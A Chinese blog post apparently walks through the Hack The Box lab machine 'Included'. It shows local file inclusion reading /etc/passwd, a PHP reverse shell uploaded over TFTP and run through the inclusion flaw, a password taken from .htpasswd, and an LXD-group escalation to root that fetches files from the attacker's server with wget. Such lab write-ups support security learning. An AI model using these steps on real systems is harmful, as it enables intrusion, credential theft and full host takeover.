STARTING POINT TIER 2 Included

最新推荐文章于 2023-11-16 17:28:31 发布
最新推荐文章于 2023-11-16 17:28:31 发布
阅读量188 收藏
点赞数
分类专栏: HTB 文章标签: tftp lxd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/125024576
版权

STARTING POINT TIER 2 Included

老规矩上来就是nmap,发现起了Apache

└─$ sudo nmap -sS -sV -sC [ip-address]
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)

进入浏览器在前端界面没有发现有用的东西,但是url可能存在路径包含

http://http://10.129.95.185/?file=home.php

包含一下/etc/passwd

curl 'http://http://10.129.95.185/?file=/etc/passwd'
#output
...
tftp:x:110:113:tftp daemon,,,:/var/lib/tftpboot:/usr/sbin/nologin

发现一个叫tftp的用户,tftp基于Trivial File Transfer Protocol传输文件。他跟ftp有什么不同呢?Difference between FTP and TFTP

其中关键的一点tftp使用UDP传输协议且不需要密码认证,先用nmap扫一下UDP端口

└─$ sudo nmap -sU -sV [ip-address]
PORT   STATE         SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open|filtered tftp

🆗那就先连一下吧

└─$ tftp [ip-address] 
tftp> put php-reverse-shell.php
Sent 5685 bytes in 4.5 seconds

我们把WebShell传了上去然后通过LFI执行我们的shell。现在的关键是需要知道我们上传的shell在哪。根据TFTP得知

The default configuration file for tftpd-hpa is /etc/default/tftpd-hpa.
The default root directory where files will be stored is /var/lib/tftpboot.

那么包含一下/var/lib/tftpboot/php-reverse-shell.php

先监听一下端口nc -lvnp 1234然后在浏览器输入http://http://10.129.95.185/?file=/var/lib/tftpboot/php-reverse-shell.php🆗反弹shell到手。

进入mike目录cat user.txt告诉我们没有权限。所以需要找到mike的密码。

查阅MDN文档使用Apache限制访问和基本身份验证

.htaccess 文件引用一个 .htpasswd 文件,其中每行用冒号(“:”)分隔的用户名和密码. 你不能看到真实的密码因为它们是 encrypted (在这个例子中是使用了 MD5). 你可以命名.htpasswd 文件 为你所喜欢的名字, 但是应该保证这个文件不被其他人访问. (Apache通常配置阻止访问 .ht* 类的文件).

.htpasswd文件记录着Apache服务器的一些账密

www-data@included:/var/www/html$ cat .htpasswd
cat .htpasswd
mike:Sheffield19

www-data@included:/var/www/html$ su mike

mike@included:/var/www/html$ cat /home/mike/user.txt

id看看mike有哪些有用的信息

mike@included:/var/www/html$ id
id
uid=1000(mike) gid=1000(mike) groups=1000(mike),108(lxd)

LXD

What is LXD?

LXD是一个容器虚拟机管理器,

LXDLXC简介

Linux Container (LXC)通常被认为是一种轻量级虚拟化技术,介于chroot和完全开发的虚拟机之间,它创建了一个尽可能接近Linux安装的环境,但不需要单独的内核。

Linux守护进程(LXD)是轻量级容器管理程序。LXD是在容器技术LXC的基础上构建的,Docker之前使用过LXC。它使用稳定的LXC API在后台完成所有容器管理,并添加REST API,提供更简单、更一致的用户体验。

一个属于lxd用户组的成员可以提升为root权限。

A member of the local “lxd” group can instantly escalate the privileges to root on the host operating system. This is irrespective of whether that user has been granted sudo rights and does not require them to enter their password. The vulnerability exists even with the LXD snap package.

至于怎么利用参考HackTrickslxd/lxc Group - Privilege escalation

按照说明启动了一个alpineimage,启动后在当前目录下会出现lxd.tar.xzrootfs.squashfs文件,需要把这2个文件传上去。

#In Listener
$ python3 -m http.server [port]
Serving HTTP on 0.0.0.0 port [port] (http://0.0.0.0:[port]/) ...

#In reverse shell
mike@included:/var/www/html$ cd /tmp
mike@included:/tmp$ wget http://[ip-address]:[port]/lxd.tar.xz
mike@included:/tmp$ wget http://[ip-address]:[port]/rootfs.squashfs

确认是否上传

mike@included:/tmp$ ls -l
-rw-rw-r-- 1 mike mike     852 May 28 08:43 lxd.tar.xz
-rw-rw-r-- 1 mike mike 2052096 May 28 08:43 rootfs.squashfs

#import the image
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

#verify that the image has been successfully imported
lxc image list
# run the image and set the security.privileged flag to true
# so that the container has all of the privileges that the root file system has
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh

提升为root权限,进入/mnt/root/root拿到root.txt

小莫神和他的的
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
test2
weixin_46254643的博客
03-09 1698
Financial Reporting and Analysis 2019 Instructor: Jackie & Vivian 1 Brief Introduction Topic weight: Study Session 1-2 Ethics & Professional Standards 10%-15% Study Session 3 Quantitative Analysis 5%-10% Study Session 4 Economics o5%-10% 10%-15% St
[StartingPoint][Tier2]Included
04-13 989
#Local File Inclusion #LXD #TFTP
HackTheBox-Starting Point--Tier 2---Included
七天
11-16 178
TFTP (Trivial File Transfer Protocol)是一种简单的协议,提供基本的文件传输功能,不需要用户身份验证。文件包含执行reverse-shell.php文件,TFTP文件路径在之前读取/etc/passwd的时候已经发现:/var/lib/tftpboot。TFTP服务器已经连接上,可以上传下载文件,此时可以通过TFTP服务器上传一个反弹shell,使用文件包含漏洞执行shell。在包含/etc/passwd文件后,发现存在mike、tftp用户。3.文件包含漏洞探测。
HTB-Tier1
32bin的博客
11-16 1668
Task 1What does the acronym SQL stand for?********** ***** *******eStructured Query LanguageHide AnswerTask 2What is one of the most common type of SQL vulnerabilities?*** ********nsql injectionHide AnswerTask 3What does PII stand for?********** **********
ROS2网络课程资料分享2019.10.26
zhangrelay的专栏
10-26 9430
目前,网络上主要的ROS2课程主要有: Constructsim:https://www.theconstructsim.com/robotigniteacademy_learnros/ros-courses-library/ros2-basics-course/ Udemy:https://www.udemy.com/course/ros2-how-to/ Adlink:https...
2013全年3GPP RAN1会议关于D2D(Device-to-Device)技术的提案分析
u012159948的专栏
02-27 1万+
说明 该文档分析了2013年6次RAN1会议中有关D2D的提案,分析的绝大部分提案是在会议report中noted的。 RAN1#72 Deployment Scenario and Evaluation Methodology 1)       R1-130029 HuaweiHiSilicon l  提出了三种场景(其中只有第二和第三种场景是noted的) n  网络覆盖下的,高
CentOS 7 搭建ELK 7.13.2 环境
搬山境KL攻城狮的修炼手册
06-29 1214
文章目录CentOS 7 部署ELK 7.13.2(单机)一、软件清单二、安装1.安装ELK2.安装插件3.安装elasticsearch-head三、配置1.主机名配置2.环境变量配置3.配置elasticsearch4.配置kibana5.配置logstash6.防火墙配置7.开机启动四、启动和关闭1.启动和关闭elasticsearch2.启动和关闭kibana CentOS 7 部署ELK 7.13.2(单机) 一、软件清单 软件 安装路径 配置文件 端口 访问地址 elastics
Oracle11gR2新特性概述
rede
03-26 1185
原 Oracle 11gR2 新特性 概述https://blog.csdn.net/tianlesoftware/article/details/7226671版权声明: https://blog.csdn.net/tianlesoftware/article/details/7226671 官网的说明链接如下: http://docs.oracle.com/cd/E11882_01/ser...
2-日志平台-日志采集
阿拉斯加大闸蟹的博客
05-17 4245
日志采集: 流程 要做的事情 日志规范 固定字段定义 日志格式 日志采集 落盘规则 滚动策略 采集方法 日志传输 消息队列 消费方式 Topic规范 保存时间 日志切分 采样 过滤 自定格式 日志检索 索引分割 分片设置 检索优化 权限设置 保存时间 日志流监控 采集异常 传输异常 检索异常 不合规范 监控报警 日志目标: Java应用logback+filebeat 之前的f...
Universal Serial Bus
andypk的专栏
03-20 4383
USB (Universal Serial Bus) is a specification[1] to establish communication between devices and a host controller (usually personal computers), developed and invented by Ajay Bhatt working in Intel.[2
Filebeat 安装、配置
hjkl_uiop的博客
08-15 750
filebeat是轻量型日志采集器,在任何环境中,始终都会潜伏着应用程序中断的风险。Filebeat 能够读取并转发日志行,并在出现中断的情况下,还会在一切恢复正常后,从中断前停止的位置继续开始。Filebeat 随附可观测性和安全数据源模块,这些模块简化了常见格式的日志的收集、解析和可视化过程,只需一条命令即可。之所以能实现这一点,是因为它将自动默认路径(因操作系统而异)与 Elasticsearch 采集节点管道的定义和 Kibana 仪表板组合在一起。不仅如此,Filebeat 的一些模块还随附了预配
A COMPLETE GUIDE TO CREDIT RISK MODELLING
平平淡淡,戒急用忍,一生学闭嘴。
08-06 5878
This article explains basic concepts and methodologies of credit risk modelling and how it is important for financial institutions. In credit risk world, statistics and machine learning play an important role in solving problems related to credit risk. ...
Globalization Guide for Oracle Applications Release 12
热门推荐
12-15 1万+
Section 1: OverviewSection 2: InstallingSection 3: ConfiguringSection 4: MaintainingSection 5: UsingSection 6: CustomizingSection 7: TranslatingSection 8: TroubleshootingAppendix A: Migrating to Unico
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
09-02
实时计算:Apache Flink:Flink与Kafka集成实现事件驱动架构.docx
移动软件开发实验五:高校新闻
09-02
移动软件开发实验五:高校新闻
分布式存储系统:Google Cloud Storage:GoogleCloudStorage架构解析.docx
09-02
分布式存储系统:Google Cloud Storage:GoogleCloudStorage架构解析.docx
基于现有explorer文件资源管理,实现跨平台告诉多标签页文件资源管理器,类似360文件管理器等,还处于起步阶段
09-02
基于现有explorer文件资源管理,实现跨平台告诉多标签页文件资源管理器,类似360文件管理器等,还处于起步阶段
关于进程之间的通信IPC,管道,信号的学习
最新发布
09-02
进程间通信(IPC)是操作系统中用于让不同进程之间相互通信的机制。管道是一种半双工的通信方式,数据只能单向流动,而且只能在具有亲缘关系的进程间使用。信号是在软件层次上对中断机制的一种模拟,是一种异步通信方式。该文章讲述了进程的通信通过管道与信号,以及扩展信号等实现进程间数据的交互。它们涵盖基础知识、代码示例和应用场景,适合初学者学习和参考。这些资源能够帮助你理解相关概念,并在实际开发中运用它们进行有效的进程间通信。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值